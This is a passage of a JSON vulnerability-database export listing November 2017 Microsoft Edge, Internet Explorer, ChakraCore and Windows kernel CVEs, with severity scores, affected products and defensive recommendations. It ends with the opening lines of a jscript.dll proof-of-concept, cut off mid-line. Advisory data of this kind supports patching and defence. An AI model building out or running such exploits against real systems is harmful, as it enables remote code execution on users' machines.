"cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*"], "id": "CVE-2017-11851", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11851", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "ChakraCore and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Microsoft Edge and Internet Explorer in Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016 and Windows Server, version 1709 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11840, CVE-2017-11841, CVE-2017-11843, CVE-2017-11858, CVE-2017-11859, CVE-2017-11861, CVE-2017-11862, CVE-2017-11866, CVE-2017-11869, CVE-2017-11870, CVE-2017-11871, and CVE-2017-11873.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11846", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11846"], "modified": "2017-12-01T15:34:00", "cpe": ["cpe:/a:microsoft:chakracore:*", "cpe:/a:microsoft:edge:*", "cpe:/a:microsoft:internet_explorer:*"], "id": "CVE-2017-11846", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11846", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:chakracore:*:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "ChakraCore and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Microsoft Edge and Internet Explorer in Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016 and Windows Server, version 1709 allows an attacker to obtain information to further compromise the user's system, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-11834.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11791", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11791"], "modified": "2017-12-07T17:28:00", "cpe": ["cpe:/a:microsoft:chakracore:*", "cpe:/a:microsoft:edge:*", "cpe:/a:microsoft:internet_explorer:*"], "id": "CVE-2017-11791", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11791", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:chakracore:*:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:*:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016 and Windows Server, version 1709 allows an attacker to trick a user into loading a page containing malicious content, due to how the Edge Content Security Policy (CSP) validates documents, aka \"Microsoft Edge Security Feature Bypass Vulnerability\". This CVE ID is unique from CVE-2017-11872 and CVE-2017-11874.", "edition": 4, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11863", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11863"], "modified": "2017-12-01T18:14:00", "cpe": ["cpe:/a:microsoft:edge:*"], "id": "CVE-2017-11863", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11863", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "ChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016 and Windows Server, version 1709 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11839, CVE-2017-11840, CVE-2017-11841, CVE-2017-11843, CVE-2017-11846, CVE-2017-11858, CVE-2017-11859, CVE-2017-11861, CVE-2017-11862, CVE-2017-11869, CVE-2017-11870, CVE-2017-11871, and CVE-2017-11873.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11866", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11866"], "modified": "2017-12-01T18:14:00", "cpe": ["cpe:/a:microsoft:chakracore:*", "cpe:/a:microsoft:edge:*"], "id": "CVE-2017-11866", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11866", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:chakracore:*:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:34", "description": "Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016 and Windows Server, version 1709 allows an attacker to take control of an affected system, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11836, CVE-2017-11837, CVE-2017-11838, CVE-2017-11840, CVE-2017-11841, CVE-2017-11843, CVE-2017-11846, CVE-2017-11858, CVE-2017-11859, CVE-2017-11861, CVE-2017-11862, CVE-2017-11866, CVE-2017-11869, CVE-2017-11870, CVE-2017-11871, and CVE-2017-11873.", "edition": 4, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-15T03:29:00", "title": "CVE-2017-11839", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11839"], "modified": "2017-12-01T15:09:00", "cpe": ["cpe:/a:microsoft:edge:*"], "id": "CVE-2017-11839", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11839", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:*:*:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2018-03-12T10:28:39", "bulletinFamily": "software", "cvelist": ["CVE-2017-11844"], "description": "### Description\n\nMicrosoft Edge is prone to an information disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101707", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101707", "type": "symantec", "title": "Microsoft Edge CVE-2017-11844 Information Disclosure Vulnerability", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-14T22:43:08", "bulletinFamily": "software", "cvelist": ["CVE-2017-11874"], "description": "### Description\n\nMicrosoft Edge is prone to a security-bypass vulnerability. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, filter access to the affected computer at the network boundary. Restricting access to only trusted computers and networks might greatly reduce the likelihood of a successful exploit.\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101750", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101750", "type": "symantec", "title": "Microsoft Edge CVE-2017-11874 Security Bypass Vulnerability", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-03-12T02:29:09", "bulletinFamily": "software", "cvelist": ["CVE-2017-11803"], "description": "### Description\n\nMicrosoft Edge is prone to an information disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101704", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101704", "type": "symantec", "title": "Microsoft Edge CVE-2017-11803 Information Disclosure Vulnerability", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-12T02:29:11", "bulletinFamily": "software", "cvelist": ["CVE-2017-11834"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to an information-disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101725", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101725", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11834 Information Disclosure Vulnerability", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-14T22:41:21", "bulletinFamily": "software", "cvelist": ["CVE-2017-11862"], "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101724", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101724", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11862 Remote Memory Corruption Vulnerability", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-13T06:16:33", "bulletinFamily": "software", "cvelist": ["CVE-2017-11851"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101763", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101763", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2017-11851 Local Information Disclosure Vulnerability", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-13T06:16:35", "bulletinFamily": "software", "cvelist": ["CVE-2017-11848"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to an information-disclosure vulnerability. Successful exploits will allow attackers to obtain sensitive information that may aid in further attacks. Internet Explorer 9, 10, and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101709", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101709", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11848 Information Disclosure Vulnerability", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-13T12:07:58", "bulletinFamily": "software", "cvelist": ["CVE-2017-11842"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101719", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101719", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2017-11842 Local Information Disclosure Vulnerability", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-03-12T04:24:48", "bulletinFamily": "software", "cvelist": ["CVE-2017-11861"], "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101723", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101723", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11861 Remote Memory Corruption Vulnerability", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:41:26", "bulletinFamily": "software", "cvelist": ["CVE-2017-11849"], "description": "### Description\n\nMicrosoft Windows is prone to a local information-disclosure vulnerability. Local attackers can exploit this issue to obtain sensitive information that may lead to further attacks.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nEnsure that only trusted users have local, interactive access to affected computers.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2017-11-14T00:00:00", "published": "2017-11-14T00:00:00", "id": "SMNTC-101762", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/101762", "type": "symantec", "title": "Microsoft Windows Kernel CVE-2017-11849 Local Information Disclosure Vulnerability", "cvss": {"score": 1.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "seebug": [{"lastseen": "2017-12-25T18:39:08", "description": "There is an uninitialized variable vulnerability in jscript.dll. This issue could potentially be exploited through multiple vectors:\r\n\r\n - By opening a malicious web page in Internet Explorer.\r\n\r\n - [currently untested] An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim.\r\n\r\nThe issue has been verified on 64-bit Windows 10 with the most recent patches applied.\r\n\r\nPoC for Internet Explorer (tested on IE 11 with a 64-bit tab process. Might no work very reliably due to the nature of the issue, please see the technical details below):\r\n\r\n```\r\n<!-- saved from url=(0014)about:internet -->\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n<script language=\"Jscript.Encode\">\r\nvar x = new 